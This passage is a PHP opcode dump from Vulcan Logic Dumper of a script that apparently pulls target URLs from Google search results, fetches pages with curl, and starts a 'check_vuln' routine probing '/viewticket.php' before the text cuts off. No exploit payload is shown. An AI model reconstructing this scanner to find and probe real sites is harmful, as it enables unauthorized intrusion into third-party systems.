   30    24        ISSET_ISEMPTY_DIM_OBJ                         0          !5, 'responseStatus'
         25      > JMPZ                                                     ~19, ->41
   31    26    >   FETCH_DIM_R                                      ~20     !5, 'responseStatus'
         27        IS_NOT_EQUAL                                             ~20, '200'
         28      > JMPZ                                                     ~21, ->30
         29    > > RETURN                                                   <false>
   32    30    >   FETCH_DIM_R                                      ~22     !5, 'responseData'
         31        FETCH_DIM_R                                      ~23     ~22, 'results'
         32        COUNT                                            ~24     ~23
         33        IS_EQUAL                                                 ~24, 0
         34      > JMPZ                                                     ~25, ->37
         35    > > RETURN                                                   <false>
         36*       JMP                                                      ->40
   33    37    >   FETCH_DIM_R                                      ~26     !5, 'responseData'
         38        FETCH_DIM_R                                      ~27     ~26, 'results'
         39      > RETURN                                                   ~27
         40*       JMP                                                      ->43
   36    41    >   CONCAT                                           ~28     'The+function+%3Cb%3Egoogle_that%3C%2Fb%3E+Kill+me+%3A%28+%3Cbr%3E', !4
         42      > EXIT                                                     ~28
   37    43*     > RETURN                                                   null

End of function google_that

Function http_get:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 4, Position 2 = 7
Branch analysis from position: 4
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 7
filename:       /in/OQ1nP
function name:  http_get
number of ops:  42
compiled vars:  !0 = $url, !1 = $safemode, !2 = $im
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   39     0  E >   RECV                                             !0      
          1        RECV_INIT                                        !1      <false>
   40     2        TYPE_CHECK                                    8          !1
          3      > JMPZ                                                     ~3, ->7
          4    >   INIT_FCALL                                               'sleep'
          5        SEND_VAL                                                 1
          6        DO_ICALL                                                 
   41     7    >   INIT_FCALL_BY_NAME                                       'curl_init'
          8        SEND_VAR_EX                                              !0
          9        DO_FCALL                                      0  $5      
         10        ASSIGN                                                   !2, $5
   42    11        INIT_FCALL_BY_NAME                                       'curl_setopt'
         12        SEND_VAR_EX                                              !2
         13        FETCH_CONSTANT                                   ~7      'CURLOPT_RETURNTRANSFER'
         14        SEND_VAL_EX                                              ~7
         15        SEND_VAL_EX                                              1
         16        DO_FCALL                                      0          
   43    17        INIT_FCALL_BY_NAME                                       'curl_setopt'
         18        SEND_VAR_EX                                              !2
         19        FETCH_CONSTANT                                   ~9      'CURLOPT_CONNECTTIMEOUT'
         20        SEND_VAL_EX                                              ~9
         21        SEND_VAL_EX                                              10
         22        DO_FCALL                                      0          
   44    23        INIT_FCALL_BY_NAME                                       'curl_setopt'
         24        SEND_VAR_EX                                              !2
         25        FETCH_CONSTANT                                   ~11     'CURLOPT_FOLLOWLOCATION'
         26        SEND_VAL_EX                                              ~11
         27        SEND_VAL_EX                                              1
         28        DO_FCALL                                      0          
   45    29        INIT_FCALL_BY_NAME                                       'curl_setopt'
         30        SEND_VAR_EX                                              !2
         31        FETCH_CONSTANT                                   ~13     'CURLOPT_HEADER'
         32        SEND_VAL_EX                                              ~13
         33        SEND_VAL_EX                                              0
         34        DO_FCALL                                      0          
   46    35        INIT_FCALL_BY_NAME                                       'curl_exec'
         36        SEND_VAR_EX                                              !2
         37        DO_FCALL                                      0  $15     
         38      > RETURN                                                   $15
   47    39*       INIT_FCALL_BY_NAME                                       'curl_close'
         40*       DO_FCALL                                      0          
   48    41*     > RETURN                                                   null

End of function http_get

Function check_vuln:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 19, Position 2 = 71
Branch analysis from position: 19
2 jumps found. (Code = 43) Position 1 = 66, Position 2 = 69
Branch analysis from position: 66
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 69
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 71
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/OQ1nP
function name:  check_vuln
number of ops:  73
compiled vars:  !0 = $url, !1 = $post, !2 = $curl_connection, !3 = $source, !4 = $infoz
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   50     0  E >   RECV                                             !0      
   51     1        INIT_FCALL                                               'dirname'
          2        SEND_VAR                                                 !0
          3        DO_ICALL                                         $5      
          4        CONCAT                                           ~6      $5, '%2Fviewticket.php'
          5        ASSIGN                                             

Generated using Vulcan Logic Dumper, using php 8.0.0

